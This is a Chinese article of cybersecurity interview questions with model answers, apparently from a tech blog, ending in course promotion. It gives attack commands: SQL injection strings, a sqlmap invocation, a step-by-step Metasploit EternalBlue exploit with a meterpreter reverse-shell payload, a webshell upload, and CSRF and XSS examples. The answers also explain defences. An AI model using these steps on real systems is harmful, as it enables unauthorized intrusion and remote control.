news 2026/4/15 20:30:54

【实用干货】网络安全面试高频考点:零基础也能轻松应对的通关指南,推荐收藏

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
【实用干货】网络安全面试高频考点:零基础也能轻松应对的通关指南,推荐收藏

不管是面安全运维、初级渗透测试,还是应届生岗位,面试官翻来覆去就问这些题!我整理了近 3 个月 20 家企业的面试真题,按「入门必问→进阶重点→项目踩坑」分类,每道题都标了考察点和 “小白能说清” 的答案,帮你避开 “答不出”“答跑偏” 的坑。

一、基础理论类(必问!占比 30%)

这类题不考复杂技术,但能筛掉 “连门都没入” 的人,答案不用太深入,说清核心逻辑就行。

1. 什么是 TCP/IP 协议?它分几层?

面试官考察点:判断你是否懂网络基础(连网络都不懂,没法做安全)

小白答案:TCP/IP 是互联网的 “交通规则”,负责数据在电脑间传输。通常分 4 层:

避坑:别记 7 层 OSI 模型!面试问 TCP/IP,说 4 层就行,小白记混反而扣分。

2. OWASP Top 10 是什么?2021 版里最常见的漏洞是啥?

面试官考察点:判断你是否了解行业通用标准(这是安全人的 “基础知识手册”)

小白答案:OWASP 是个安全组织,Top 10 就是它总结的 “最常见的 10 种 Web 漏洞”,2021 版里排第一的是 “注入漏洞”(比如 SQL 注入),还有跨站脚本(XSS)、失效的身份认证这些。

我记的时候会抓重点:比如注入漏洞就是黑客把恶意代码 “掺” 进正常请求里,让服务器执行;像输入框里输’ or 1=1–,可能就会绕过登录,这就是简单的 SQL 注入。

避坑:别说 “我记不全 10 个”,重点说清前 3 个(注入、XSS、失效认证),加个小例子,比记全更加分。

3. 什么是防火墙?它能防住所有攻击吗?

面试官考察点:判断你是否懂基础防护工具(安全运维岗必问)

小白答案:防火墙像网络的 “守门人”,按规则控制哪些数据能进、哪些能出。比如公司防火墙会禁止外部 IP 访问内部服务器的 22 端口(SSH),防止被远程登录。

但它防不住所有攻击:比如黑客用正常端口(像 80、443,浏览器用的端口)传恶意数据,防火墙可能识别不出来;还有内部员工误点钓鱼链接,防火墙也管不了。

加分项:提一句 “现在有下一代防火墙(NGFW),能识别应用层攻击,比传统的好一些”,显露出你了解新技术。

4. HTTP 和 HTTPS 的区别是什么?HTTPS 怎么保证安全?

面试官考察点:判断你是否懂 Web 通信安全(渗透测试、安全运维都问)

小白答案:最直观的是网址开头,HTTP 没锁,HTTPS 有小绿锁。核心区别是 HTTPS 多了 “SSL/TLS 加密”:

它保证安全靠 “证书”:比如百度的 HTTPS 证书是第三方机构发的,证明这个网站是真的,不是黑客仿的;同时传输过程中会用对称加密(快)+ 非对称加密(安全)结合的方式。

避坑:别只说 “HTTPS 更安全”,要讲清 “加密” 和 “证书” 这两个关键点。

二、工具实操类(核心!占比 40%)

面试官最烦 “只会背理论,不会用工具” 的人,这类题一定要结合 “具体操作” 说,哪怕是靶场经验也行。

1. 用 Nmap 做端口扫描,常用的命令有哪些?比如想扫 192.168.1.1 的常用端口。

面试官考察点:判断你是否会用基础扫描工具(渗透测试、运维必问)

小白答案:我常用的有 3 个命令,都是在 Kali Linux 里敲的:

我在 DVWA 靶场练过,扫出来 80 端口开放,就能接着用浏览器访问靶场了。

避坑:别只说命令,加个 “用在哪” 的场景,比如 “扫靶场端口”,证明你真用过。

2. Burp Suite 怎么抓包改包?比如想改一个登录请求的参数。

面试官考察点:判断你是否会用 Web 安全核心工具(渗透测试必问)

小白答案:首先得在浏览器里设代理(比如 Burp 默认是 127.0.0.1:8080),这样浏览器的请求会先过 Burp。

抓包改包分 3 步:

  1. 打开 Burp 的 “Proxy” 模块,点 “Intercept is on”(开启拦截);
  2. 在浏览器里输登录账号密码,点登录 —— 这时候请求会被 Burp 拦住,在 “Raw” 标签里能看到请求数据,比如username=test&password=123;
  3. 把password=123改成password=456,点 “Forward”(放行),服务器就会收到改过的请求。

我练 SQL 注入时,就用这个方法改请求里的参数,比如把id=1改成id=1’ or 1=1–,看服务器会不会返回所有数据。

加分项:提一句 “改完包后可以用‘Repeater’模块反复发请求,测试不同参数的效果”,显露出你会深入用工具。

3. Metasploit 怎么用?比如想利用 Windows 的永恒之蓝漏洞。

面试官考察点:判断你是否会用漏洞利用工具(渗透测试进阶题)

小白答案:Metasploit 是个漏洞利用框架,里面有很多现成的 “攻击模块”。用永恒之蓝的话,我在 Kali 里会这么操作:

  1. 先启动 msfconsole(打开框架);
  2. 搜永恒之蓝的模块:search eternalblue,会出来exploit/windows/smb/ms17_010_eternalblue;
  3. 加载模块:use exploit/windows/smb/ms17_010_eternalblue;
  4. 设目标 IP:set RHOSTS 192.168.1.10(靶机的 IP);
  5. 设攻击载荷(就是成功后要执行的命令):set PAYLOAD windows/x64/meterpreter/reverse_tcp(这个载荷能拿到靶机的远程控制权限);
  6. 设自己的 IP(让靶机连回来):set LHOST 192.168.1.20;
  7. 最后运行:exploit,如果成功,就能用shell命令控制靶机了。

我在 VulnHub 的 Win7 靶机上练过,成功拿到过桌面控制权限。

避坑:别只说步骤,加 “靶机环境”,说明你是在合法环境里练的,不是乱扫真实网站。

4. 怎么用 Wireshark 抓 HTTP 包?怎么过滤出指定 IP 的流量?

面试官考察点:判断你是否会分析网络流量(安全运维、应急响应必问)

小白答案:Wireshark 是抓包工具,能看所有经过网卡的数据包。

抓 HTTP 包步骤:

  1. 打开 Wireshark,选要抓包的网卡(比如 Wi-Fi 的网卡);
  2. 直接点 “开始”,就能看到所有流量;
  3. 要过滤 HTTP 包,在上面的过滤框里输 “http”,就能只显示 HTTP 的请求和响应(比如能看到浏览器向百度发的 GET 请求)。

如果想过滤指定 IP 的流量,比如只看 192.168.1.10 的包,过滤框里输 “ip.addr == 192.168.1.10”;如果想看出向 192.168.1.10 的包,输 “ip.dst == 192.168.1.10”。

我之前排查 “网页加载慢” 的问题,就用 Wireshark 抓包,发现是某个 IP 的响应时间太长,后来把那个 IP 加入防火墙白名单就好了。

三、漏洞原理类(进阶!占比 20%)

这类题要讲清 “是什么 + 怎么来的 + 怎么防”,不用太深入底层,但逻辑要通。

1. 什么是 SQL 注入?怎么检测?怎么防御?

面试官考察点:判断你是否懂最常见的 Web 漏洞(所有安全岗必问)

小白答案:SQL 注入就是黑客把 SQL 语句 “掺” 进用户输入里,让服务器误执行。比如登录页面的用户名输入框,正常输 “test”,服务器会执行select * from user where username=‘test’;如果黑客输test’ or 1=1–,服务器就会执行select * from user where username=‘test’ or 1=1–',“or 1=1” 永远为真,就能绕过登录。

检测方法:我常用两种 ——

  1. 手动测:在输入框里输’,如果服务器返回报错(比如 “SQL syntax error”),说明可能有注入点;
  2. 工具测:用 Burp 的 “Active Scan” 扫,或者用 SQLMap(命令比如sqlmap -u “http://test.com/login.php?username=test”),能自动检测是否有注入,还能提权。

防御方法:核心是 “过滤用户输入”,比如:

  1. 用参数化查询( PreparedStatement ),让用户输入的内容只能当 “数据”,不能当 SQL 命令;
  2. 给数据库账号降权,比如查询用的账号不让删表、改数据;
  3. 用 WAF(Web 应用防火墙),自动拦截注入语句。
2. 什么是 XSS 攻击?分哪几种?怎么防?

面试官考察点:判断你是否懂前端安全漏洞(渗透测试、Web 安全岗必问)

小白答案:XSS 就是黑客把恶意 JS 代码 “插” 进网页里,让其他用户访问时执行。比如论坛评论区,黑客发一条带的评论,如果网站没过滤,其他用户看评论时就会弹出弹窗,严重的话会被偷 Cookie(登录信息)。

分 3 种:

  1. 存储型 XSS:恶意代码存在服务器里(比如评论、数据库),所有人看都触发(最危险,比如论坛评论);
  2. 反射型 XSS:恶意代码在 URL 里(比如http://test.com/search.php?key=%3Cscript%3E…%3C/script%3E),只有点链接的人触发(比如钓鱼链接);
  3. DOM 型 XSS:恶意代码通过操作页面 DOM 触发(比如 JS 里用document.write(location.href),没过滤 URL 参数),不经过服务器。

防御方法:

  1. 转义特殊字符:比如把<改成<,>改成>,让 JS 代码变成普通文字;
  2. 用 CSP(内容安全策略):在 HTTP 头里设Content-Security-Policy: default-src ‘self’,限制只能加载自己域名的资源,不让加载恶意 JS;
  3. 给 Cookie 加HttpOnly属性,让 JS 拿不到 Cookie,就算有 XSS 也偷不了登录信息。
3. 什么是 CSRF 攻击?和 XSS 有啥区别?怎么防?

面试官考察点:判断你是否能区分相似漏洞(进阶岗必问)

小白答案:CSRF 是 “跨站请求伪造”,比如黑客骗你点一个链接,这个链接会自动向你已登录的网站发请求(比如转账、改密码),因为你登录过,网站认你的 Cookie,就会执行这个请求。

举个例子:你登录了某银行网站(Cookie 还在),然后点了黑客发的链接http://bank.com/transfer?to=黑客账号&money=1000,如果银行没防 CSRF,就会自动转钱。

和 XSS 的区别:XSS 是黑客往网页里插 “恶意代码”,让用户执行;CSRF 是黑客 “骗用户发请求”,利用用户的登录状态做事,不需要插代码。

防御方法:

  1. 加 CSRF Token:网站给每个表单加一个随机字符串(Token),提交时要带这个 Token,黑客不知道 Token,就发不了有效请求;
  2. 检查 Referer 头:判断请求是不是从自己网站发的(比如 Referer 是http://bank.com才允许,黑客的链接 Referer 是别的域名);
  3. 重要操作要二次验证(比如转账输验证码)。
四、项目 / 经验类(定薪关键!占比 10%)

小白没真实项目也别怕,说靶场经验、练手案例就行,重点讲 “你做了什么 + 遇到什么问题 + 怎么解决的”。

1. 你有没有做过漏洞挖掘 / 渗透测试的项目?具体说下流程。

面试官考察点:判断你是否有实战能力(没经验会减分,但说清靶场经验能补救)

小白答案:我虽然没企业项目经验,但在 Hack The Box 和 DVWA 靶场做过完整的渗透测试,流程和实际项目差不多,比如 DVWA 靶场的测试:

  1. 信息收集:用 Nmap 扫出靶机 IP 是 192.168.1.10,80 端口开放,跑的是 Apache 服务;用 Burp 抓包看是 PHP 网站,DVWA 版本是 1.10;
  2. 漏洞扫描:用 Burp Active Scan 扫,发现登录页有 SQL 注入,评论区有 XSS;
  3. 漏洞利用:
  1. 提权:登录后台后,发现有文件上传功能,上传了一个带马的 PHP 文件(用蚁剑连接),拿到服务器的 www-data 权限;
  2. 报告输出:整理了 2 个漏洞的详细步骤、截图,还有修复建议(比如用参数化查询防注入,转义字符防 XSS)。

我还在漏洞盒子平台提交过一个小漏洞(某企业官网的反射型 XSS),虽然没拿奖金,但学会了怎么写规范的漏洞报告。

避坑:别瞎编企业项目!说靶场 + 公益漏洞平台经验,比编的真实,面试官更认。

2. 如果你发现服务器被入侵了,怎么应急响应?

面试官考察点:判断你是否有解决问题的思路(安全运维、应急响应岗必问)

小白答案:我会按 “止损→查原因→修复→总结” 四步来:

  1. 先止损:比如服务器有异常进程,先 kill 掉;如果是 Web 入侵,先把网站临时下线,或者用防火墙阻断异常 IP;如果数据被删,先断开服务器的网络,防止进一步破坏;
  2. 查原因:
  1. 修复:删除后门文件,改所有账号的密码(尤其是 root、管理员账号),补漏洞(比如服务器有永恒之蓝漏洞,就装补丁),如果数据丢了,用备份恢复;
  2. 总结:写应急报告,记清楚入侵时间、原因、损失、修复步骤,下次针对性加固(比如开启日志审计,定期扫漏洞)。

我在 VMware 里模拟过 “服务器被植入木马” 的场景,用这个流程成功找到木马文件(/tmp/backdoor.sh),并修复了。

五、备考建议:3 天突击就能用的方法
  1. 优先背工具题:Nmap、Burp、SQLMap 的常用命令,记 3-5 个就行,面试时说 “我常用 XX 命令做 XX 事”,比背理论管用;
  2. 漏洞题加例子:讲 SQL 注入时,说 “我在 DVWA 里输’ or 1=1–绕过登录”,比干讲原理更真实;
  3. 模拟面试:找个学安全的朋友,让他随便抽上面的题,你脱稿说,练 3 次就能克服紧张;
  4. 资料包:我整理了适合零基础小白的笔记和资料,包括整理好的几套面试题,扫码下方二维码就能免费领取,打印出来背更方便。


为了帮助大家更好的塑造自己,成功转型,我给大家准备了一份网络安全入门/进阶学习资料,里面的内容都是适合零基础小白的笔记和资料,不懂编程也能听懂、看懂这些资料!

网络安全/黑客零基础入门

【----帮助网安学习,以下所有学习资料文末免费领取!----】

> ① 网安学习成长路径思维导图
> ② 60+网安经典常用工具包
> ③ 100+SRC漏洞分析报告
> ④ 150+网安攻防实战技术电子书
> ⑤ 最权威CISSP 认证考试指南+题库
> ⑥ 超1800页CTF实战技巧手册
> ⑦ 最新网安大厂面试题合集(含答案)
> ⑧ APP客户端安全检测指南(安卓+IOS)

1.成长路线图&学习规划

要学习一门新的技术,作为新手一定要先学习成长路线图方向不对,努力白费

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图&学习规划。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

2.视频教程

很多朋友都不喜欢晦涩的文字,我也为大家准备了视频教程,其中一共有21个章节,每个章节都是当前板块的精华浓缩

3.SRC&黑客文籍

大家最喜欢也是最关心的SRC技术文籍&黑客技术也有收录

SRC技术文籍:

黑客资料由于是敏感资源,这里不能直接展示哦!

4.护网行动资料

其中关于HW护网行动,也准备了对应的资料,这些内容可相当于比赛的金手指!

5.黑客必读书单

6.面试题合集

当你自学到这里,你就要开始思考找工作的事情了,而工作绕不开的就是真题和面试题。


需要的话可以扫描下方卡片加我耗油发给你(都是无偿分享的),大家也可以一起学习交流一下。

网络安全学习路线&学习资源

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/4/8 15:08:53

互联网大厂Java面试:严肃面试官与搞笑程序员的对决111

场景&#xff1a; 在某互联网大厂的面试室&#xff0c;一位严肃的面试官正准备提问&#xff0c;而对面坐着一位看似紧张却又想显得轻松的程序员小张。 面试官&#xff1a;我们先来聊聊Java核心知识。第一个问题&#xff0c;Java中的JVM是如何管理内存的&#xff1f; 程序员小张…

作者头像 李华
网站建设 2026/4/13 14:49:40

航空航天领域如何实现大文件秒传的解决方案总结?

最近做在做ePartner项目&#xff0c;涉及到文件上传的问题。 以前也做过文件上传&#xff0c;但都是些小文件&#xff0c;不超过2M。 这次要求上传100M以上的东西。 没办法找来资料研究了一下。基于WEB的文件上传可以使用FTP和HTTP两种协议&#xff0c;用FTP的话虽然传输稳定&a…

作者头像 李华
网站建设 2026/3/26 8:31:32

医院电子病历TinyMCE粘贴Word批注内容出现乱码怎么修复?

CMS企业官网编辑器扩展开发记录 需求分析与技术评估 作为上海的一名PHP全栈开发者&#xff0c;我最近接手了一个CMS企业官网的外包项目。客户提出了一项新需求&#xff1a;在TinyMCE 5编辑器中增加Office文档导入和一键粘贴功能。 核心需求点&#xff1a; 支持Word/Excel/P…

作者头像 李华